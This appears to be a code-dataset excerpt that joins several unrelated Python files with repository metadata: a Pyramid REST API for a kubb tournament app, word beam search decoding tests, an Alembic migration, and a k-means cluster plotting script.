for id, term in enumerate(self.vocas):
freq = self.docfreq[id]
if freq > threshold:
new_id = len(new_vocas)
self.vocas_id[term] = new_id
new_vocas.append(term)
new_docfreq.append(freq)
conv_map[id] = new_id
self.vocas = new_vocas
self.docfreq = new_docfreq
def conv(doc):
new_doc = []
for id in doc:
if id in conv_map: new_doc.append(conv_map[id])
return new_doc
return [conv(doc) for doc in corpus]
def __getitem__(self, v):
return self.vocas[v]
def size(self):
return len(self.vocas)
def is_stopword_id(self, id):
return self.vocas[id] in stopwords_list
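# Hypothetical usage sketch (not part of the original module): it assumes MeCab
# and the NLTK 'stopwords'/'wordnet' data used at import time are available,
# since the module-level stopword list and lemmatizer depend on them.
if __name__ == "__main__":
    docs = [["the", "cats", "chased", "mice"],
            ["mice", "ran", "from", "cats"]]
    voca = Vocabulary(excluds_stopwords=True)
    corpus_ids = [voca.doc_to_ids(doc) for doc in docs]
    print(voca.size(), corpus_ids)
    # Keep only terms whose document frequency exceeds the threshold.
    corpus_ids = voca.cut_low_freq(corpus_ids, threshold=1)
    print([voca[i] for i in corpus_ids[0]])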
| 26.072993
| 79
| 0.56075
| 2,028
| 0.567749
| 0
| 0
| 0
| 0
| 0
| 0
| 385
| 0.107783
|
9ffac072e4010a04d6f1b435f72c2103f99a9533
| 7,664
|
py
|
Python
|
kubb_match/views/rest.py
|
BartSaelen/kubb_match
|
848663bb3db5da73b726a956aa887c3eec30db8b
|
[
"Apache-2.0"
] | 2
|
2015-05-03T13:42:27.000Z
|
2015-08-07T07:42:29.000Z
|
kubb_match/views/rest.py
|
BartSaelen/kubb_match
|
848663bb3db5da73b726a956aa887c3eec30db8b
|
[
"Apache-2.0"
] | 2
|
2016-09-15T12:38:22.000Z
|
2016-09-15T12:41:18.000Z
|
kubb_match/views/rest.py
|
BartSaelen/kubb_match
|
848663bb3db5da73b726a956aa887c3eec30db8b
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from pyramid.httpexceptions import HTTPBadRequest, HTTPNotFound
from pyramid.view import view_defaults, view_config
from kubb_match.data.mappers import map_team, map_game
from kubb_match.data.models import Team
from kubb_match.service.tournament_service import TournamentService
class RestView(object):
def __init__(self, request):
self.request = request
self.data_manager = request.data_managers['data_manager']
def _get_json_body(self):
try:
json_body = self.request.json_body
except AttributeError as e:
raise HTTPBadRequest(detail="Request bevat geen json body. \n%s" % e)
except ValueError as e:
raise HTTPBadRequest(detail="Request bevat incorrecte json body. \n%s" % e)
if 'id' in self.request.matchdict and 'id' not in json_body:
json_body['id'] = self.request.matchdict['id']
return json_body
@view_defaults(renderer='json', accept='application/json')
class TeamView(RestView):
@view_config(route_name='teams',
request_method='GET',
permission='view',
renderer='listjson')
def get_teams(self):
return self.data_manager.get_teams()
@view_config(route_name='team',
request_method='GET',
permission='view',
renderer='itemjson')
def get_team(self):
tid = self.request.matchdict['id']
t = self.data_manager.get_team(tid)
if not t:
return HTTPNotFound()
return t
def edit_team(self, t, json_body):
t = map_team(json_body, t)
t = self.data_manager.save(t)
return t
@view_config(
route_name='teams',
request_method='POST',
permission='admin',
renderer='itemjson'
)
def add_team(self):
team_data = self._get_json_body()
t = Team()
t = self.edit_team(t, team_data)
self.request.response.status = '201'
self.request.response.location = \
self.request.route_path('team', id=t.id)
return t
@view_config(
route_name='team',
request_method='PUT',
permission='admin',
renderer='itemjson'
)
def update_team(self):
tid = self.request.matchdict.get('id')
t = self.data_manager.get_team(tid)
if not t:
return HTTPNotFound()
team_data = self._get_json_body()
if 'id' in self.request.matchdict and 'id' not in team_data:
team_data['id'] = self.request.matchdict['id']
t = self.edit_team(t, team_data)
self.request.response.status = '200'
self.request.response.location = \
self.request.route_path('team', id=t.id)
return t
@view_defaults(renderer='json', accept='application/json')
class RoundView(RestView):
@view_config(route_name='rounds',
request_method='GET',
permission='view',
renderer='listjson')
def get_rounds(self):
return self.data_manager.get_rounds()
@view_config(route_name='round',
request_method='GET',
permission='view',
renderer='itemjson')
def get_round(self):
rid = self.request.matchdict['id']
r = self.data_manager.get_round(rid)
if not r:
return HTTPNotFound()
return r
@view_config(route_name='round_games',
request_method='GET',
permission='view',
renderer='listjson')
def get_games(self):
rid = self.request.matchdict['id']
r = self.data_manager.get_round(rid)
return r.games
@view_config(route_name='round_game',
request_method='GET',
permission='view',
renderer='itemjson')
def get_game(self):
rid = self.request.matchdict['id']
r = self.data_manager.get_round(rid)
if not r:
return HTTPNotFound()
gid = self.request.matchdict['gid']
game = self.data_manager.get_game(gid)
return game
@view_config(route_name='round_game',
request_method='PUT',
permission='view',
renderer='itemjson')
def edit_game(self):
rid = self.request.matchdict['id']
r = self.data_manager.get_round(rid)
if not r:
return HTTPNotFound()
gid = self.request.matchdict['gid']
game = self.data_manager.get_game(gid)
game_data = self._get_json_body()
if 'gid' in self.request.matchdict and 'gid' not in game_data:
game_data['gid'] = self.request.matchdict['gid']
game = map_game(game_data, game)
game = self.data_manager.save(game)
return game
@view_config(route_name='round_positions',
request_method='GET',
permission='view',
renderer='listjson')
def get_positions(self):
rid = self.request.matchdict['id']
r = self.data_manager.get_round(rid)
return r.positions
@view_defaults(renderer='json', accept='application/json')
class TournamentPhaseView(RestView):
def __init__(self, request):
super().__init__(request)
self.tournament_service = TournamentService(self.data_manager)
@view_config(route_name='phases',
request_method='GET',
permission='view',
renderer='listjson')
def get_phases(self):
return self.data_manager.get_phases()
@view_config(route_name='phase',
request_method='GET',
permission='view',
renderer='itemjson')
def get_phase(self):
pid = self.request.matchdict['id']
p = self.data_manager.get_phase(pid)
if not p:
return HTTPNotFound()
return p
@view_config(route_name='phase_status',
request_method='POST',
permission='view',
renderer='itemjson')
def tournament_phase_status(self):
data = self._get_json_body()
pid = self.request.matchdict['id']
if 'status' not in data:
return HTTPBadRequest('status should be present')
else:
status = data['status']
round = None
p = self.data_manager.get_phase(pid)
if status == 'init':
if not p:
return HTTPNotFound()
if p.type == 'battle':
round = self.tournament_service.init_battle_phase(p)
elif p.type == 'ko':
p1 = self.data_manager.get_phase(1)
lr = next((r for r in p1.rounds if not r.played))
round = self.tournament_service.init_ko_phase(p, lr.positions)
round = round['A']
elif status == 'next':
if p.type == 'battle':
round = self.tournament_service.next_battle_round(p)
elif p.type == 'ko':
round = self.tournament_service.next_ko_round(p)
round = round[0]
elif status == 'final':
if p.type == 'battle':
round = self.tournament_service.final_battle_round(p)
elif p.type == 'ko':
round = self.tournament_service.final_ko_round(p)
round = round[0]
else:
                return HTTPBadRequest('invalid status')
self.request.response.status = '201'
self.request.response.location = \
self.request.route_path('round', id=round.id)
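# Hypothetical request sketch (not part of the original views): the view above,
# registered under the 'phase_status' route, expects a JSON body such as
# {"status": "init"}, {"status": "next"} or {"status": "final"}; on success it
# answers 201 with a Location header pointing at the newly created round, while
# any other status value yields a 400 response.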
| 34.678733
| 87
| 0.579201
| 7,172
| 0.935804
| 0
| 0
| 6,714
| 0.876044
| 0
| 0
| 840
| 0.109603
|
9ffb3711d6a34d1adba73090bd3c202a99a4f456
| 2,651
|
py
|
Python
|
CTCWordBeamSearch-master/tests/test_word_beam_search.py
|
brucegrapes/htr
|
9f8f07173ccc740dd8a4dfc7e8038abe36664756
|
[
"MIT"
] | 488
|
2018-03-01T11:18:26.000Z
|
2022-03-10T09:29:32.000Z
|
CTCWordBeamSearch-master/tests/test_word_beam_search.py
|
brucegrapes/htr
|
9f8f07173ccc740dd8a4dfc7e8038abe36664756
|
[
"MIT"
] | 60
|
2018-03-10T18:37:51.000Z
|
2022-03-30T19:37:18.000Z
|
CTCWordBeamSearch-master/tests/test_word_beam_search.py
|
brucegrapes/htr
|
9f8f07173ccc740dd8a4dfc7e8038abe36664756
|
[
"MIT"
] | 152
|
2018-03-01T11:18:25.000Z
|
2022-03-08T23:37:46.000Z
|
import codecs
import numpy as np
from word_beam_search import WordBeamSearch
def apply_word_beam_search(mat, corpus, chars, word_chars):
"""Decode using word beam search. Result is tuple, first entry is label string, second entry is char string."""
T, B, C = mat.shape
# decode using the "Words" mode of word beam search with beam width set to 25 and add-k smoothing to 0.0
assert len(chars) + 1 == C
wbs = WordBeamSearch(25, 'Words', 0.0, corpus.encode('utf8'), chars.encode('utf8'), word_chars.encode('utf8'))
label_str = wbs.compute(mat)
# result is string of labels terminated by blank
char_str = []
for curr_label_str in label_str:
s = ''
for label in curr_label_str:
s += chars[label] # map label to char
char_str.append(s)
return label_str[0], char_str[0]
def load_mat(fn):
"""Load matrix from csv and apply softmax."""
mat = np.genfromtxt(fn, delimiter=';')[:, :-1] # load matrix from file
T = mat.shape[0] # dim0=t, dim1=c
# apply softmax
res = np.zeros(mat.shape)
for t in range(T):
y = mat[t, :]
e = np.exp(y)
s = np.sum(e)
res[t, :] = e / s
# expand to TxBxC
return np.expand_dims(res, 1)
def test_mini_example():
"""Mini example, just to check that everything is working."""
corpus = 'a ba' # two words "a" and "ba", separated by whitespace
chars = 'ab ' # the first three characters which occur in the matrix (in this ordering)
word_chars = 'ab' # whitespace not included which serves as word-separating character
mat = np.array([[[0.9, 0.1, 0.0, 0.0]], [[0.0, 0.0, 0.0, 1.0]],
                    [[0.6, 0.4, 0.0, 0.0]]])  # 3 time-steps and 4 characters per time-step ("a", "b", " ", blank)
res = apply_word_beam_search(mat, corpus, chars, word_chars)
print('')
print('Mini example:')
print('Label string:', res[0])
print('Char string:', '"' + res[1] + '"')
assert res[1] == 'ba'
def test_real_example():
"""Real example using a sample from a HTR dataset."""
data_path = '../data/bentham/'
corpus = codecs.open(data_path + 'corpus.txt', 'r', 'utf8').read()
chars = codecs.open(data_path + 'chars.txt', 'r', 'utf8').read()
word_chars = codecs.open(data_path + 'wordChars.txt', 'r', 'utf8').read()
mat = load_mat(data_path + 'mat_2.csv')
res = apply_word_beam_search(mat, corpus, chars, word_chars)
print('')
print('Real example:')
print('Label string:', res[0])
print('Char string:', '"' + res[1] + '"')
assert res[1] == 'submitt both mental and corporeal, is far beyond any idea'
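# Minimal sketch (not part of the original tests): the per-timestep softmax loop
# in load_mat is equivalent to this vectorized form, demonstrated on random
# logits so it runs without any csv file.
if __name__ == "__main__":
    rng = np.random.default_rng(0)
    logits = rng.normal(size=(4, 5))  # T x C
    e = np.exp(logits)
    vectorized = e / e.sum(axis=1, keepdims=True)
    looped = np.zeros_like(logits)
    for t in range(logits.shape[0]):
        row = np.exp(logits[t, :])
        looped[t, :] = row / row.sum()
    assert np.allclose(vectorized, looped)
    print("softmax loop and vectorized form agree")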
| 35.346667
| 115
| 0.614485
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,075
| 0.405507
|
9ffdc1e59bb26b37e4cdbdb001abd755fccd616d
| 859
|
py
|
Python
|
src/api/migrations/versions/2021-09-25_add_session_type_and_instructor.py
|
YACS-RCOS/yacs.n
|
a04f8e79279826914b942e3a8c709c50f08ff149
|
[
"MIT"
] | 20
|
2020-02-29T19:03:31.000Z
|
2022-02-18T21:13:12.000Z
|
src/api/migrations/versions/2021-09-25_add_session_type_and_instructor.py
|
YACS-RCOS/yacs.n
|
a04f8e79279826914b942e3a8c709c50f08ff149
|
[
"MIT"
] | 465
|
2020-02-29T19:08:18.000Z
|
2022-03-18T22:21:49.000Z
|
src/api/migrations/versions/2021-09-25_add_session_type_and_instructor.py
|
YACS-RCOS/yacs.n
|
a04f8e79279826914b942e3a8c709c50f08ff149
|
[
"MIT"
] | 19
|
2020-02-29T01:22:23.000Z
|
2022-02-14T01:47:09.000Z
|
"""add session type and instructor
Revision ID: 54df4fb8dfe9
Revises: a3be4710680d
Create Date: 2021-09-25 03:08:18.501929
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '54df4fb8dfe9'
down_revision = 'a3be4710680d'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('course_session', sa.Column('instructor', sa.VARCHAR(length=255), nullable=True))
op.add_column('course_session', sa.Column('session_type', sa.VARCHAR(length=255), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('course_session', 'session_type')
op.drop_column('course_session', 'instructor')
# ### end Alembic commands ###
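# Hypothetical usage note (not part of the generated migration): with Alembic
# configured for this project, this revision would typically be applied with
# `alembic upgrade head` (or `alembic upgrade 54df4fb8dfe9`) and rolled back
# with `alembic downgrade a3be4710680d`.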
| 27.709677
| 101
| 0.71362
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 494
| 0.575087
|
9ffddf9f2ec970e9ca9b3a8192c022d87d76144d
| 1,656
|
py
|
Python
|
plot_data.py
|
qzane/kmeans-cuda
|
f2a0e8dd6859cf735c95e1365342f4623f0a71ff
|
[
"MIT"
] | null | null | null |
plot_data.py
|
qzane/kmeans-cuda
|
f2a0e8dd6859cf735c95e1365342f4623f0a71ff
|
[
"MIT"
] | null | null | null |
plot_data.py
|
qzane/kmeans-cuda
|
f2a0e8dd6859cf735c95e1365342f4623f0a71ff
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 27 22:31:17 2018
@author: qzane
"""
import numpy as np
import matplotlib.pyplot as plt
from argparse import ArgumentParser
def read_points(fname):
points = []
with open(fname) as f:
while(1):
tmp = f.readline()
if tmp == '':
break
if ',' in tmp:
f1,f2 = tmp.split(',')[:2]
f1,f2 = float(f1), float(f2)
points.append((f1,f2))
return np.array(points)
def read_classes(fname):
classes = []
with open(fname) as f:
while(1):
tmp = f.readline()
if tmp == '':
break
_class = int(tmp)
classes.append(_class)
return np.array(classes)
def plot(points, classes):
assert(points.shape[0]==classes.shape[0])
num_classes = classes.max()+1
cmap = plt.get_cmap('jet')
colors = [cmap(i) for i in np.linspace(0, 1, num_classes)]
for i in range(num_classes):
plt.plot(points[classes==i,0], points[classes==i,1], 'x', color=colors[i])
plt.show()
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument('-p', '--points', action='store', type=str, required=True,
help='points.txt')
parser.add_argument('-c', '--classes', action='store', type=str, required=True,
help='classes.txt')
args = parser.parse_args()
points = read_points(args.points)
classes = read_classes(args.classes)
plot(points, classes)
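# Hypothetical input sketch (not part of the original script): read_points
# expects one "x,y" pair per line and read_classes one integer label per line,
# so a 3-point / 2-cluster input could look like
#
#   points.txt      classes.txt
#   0.0,0.1         0
#   0.2,0.0         0
#   5.1,4.9         1
#
# after which `python plot_data.py -p points.txt -c classes.txt` renders the
# coloured scatter plot.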
| 25.090909
| 83
| 0.532609
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 200
| 0.120773
|